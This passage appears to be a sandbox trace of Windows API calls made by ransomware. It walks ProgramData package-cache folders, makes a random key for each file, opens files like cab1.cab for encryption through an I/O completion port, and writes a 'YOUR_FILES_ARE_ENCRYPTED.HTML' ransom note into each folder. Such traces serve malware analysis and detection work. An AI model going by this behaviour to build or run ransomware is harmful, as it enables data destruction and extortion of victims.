hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.080] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.080] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned 113 [0158.080] GetProcessHeap () returned 0x270000 [0158.080] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.082] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" [0158.083] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*" [0158.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.083] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.083] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb21afe00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xb21afe00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xb21afe00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x14de75, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.083] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0158.083] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.083] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.083] lstrlenW (lpString=".cab") returned 4 [0158.083] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.083] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0158.084] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=1367669) returned 1 [0158.084] GetProcessHeap () returned 0x270000 [0158.084] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.090] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="47") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="81") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="6B") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="00") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="3F") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="B5") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1F") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B3") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A3") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CA") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B1") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="C7") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="CE") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="92") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="5A") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="5B") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D8") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="30") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="FC") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="07") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="1A") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="FC") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="02") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="CE") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F2") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="DD") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="91") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="70") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="85") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="83") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="15") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="3D") returned 2 [0158.092] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0158.092] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.092] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.092] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.092] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0158.092] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.092] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.092] lstrlenW (lpString=".msi") returned 4 [0158.092] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.092] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.093] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.093] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0158.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0158.185] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.188] CloseHandle (hObject=0x4a8) returned 1 [0158.188] GetProcessHeap () returned 0x270000 [0158.189] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.196] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.196] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.196] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0158.197] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.197] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.200] CloseHandle (hObject=0x598) returned 1 [0158.200] GetProcessHeap () returned 0x270000 [0158.201] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.202] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.202] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.202] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0158.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.203] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.205] CloseHandle (hObject=0x58c) returned 1 [0158.211] GetProcessHeap () returned 0x270000 [0158.212] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.213] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf974b9d0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0158.213] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 71 [0158.213] GetProcessHeap () returned 0x270000 [0158.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.213] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0158.213] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*" [0158.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf974b9d0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf974b9d0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf974b9d0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xfc4f7ff0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0158.214] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0158.214] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.214] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.214] lstrlenW (lpString=".rsm") returned 4 [0158.214] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf96ff710, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xbe37ee50, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0158.214] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0158.214] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.214] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.214] lstrlenW (lpString=".exe") returned 4 [0158.214] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf96ff710, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xbe37ee50, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0158.215] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.215] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0158.215] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.218] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.221] CloseHandle (hObject=0x58c) returned 1 [0158.221] GetProcessHeap () returned 0x270000 [0158.222] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.222] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x359dcc70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{65e650ff-30be-469d-b63a-418d71ea1765}", cAlternateFileName="{65E65~1")) returned 1 [0158.222] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 71 [0158.222] GetProcessHeap () returned 0x270000 [0158.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.223] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" [0158.223] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*" [0158.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x359dcc70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.223] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x359dcc70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.223] FindNextFileW 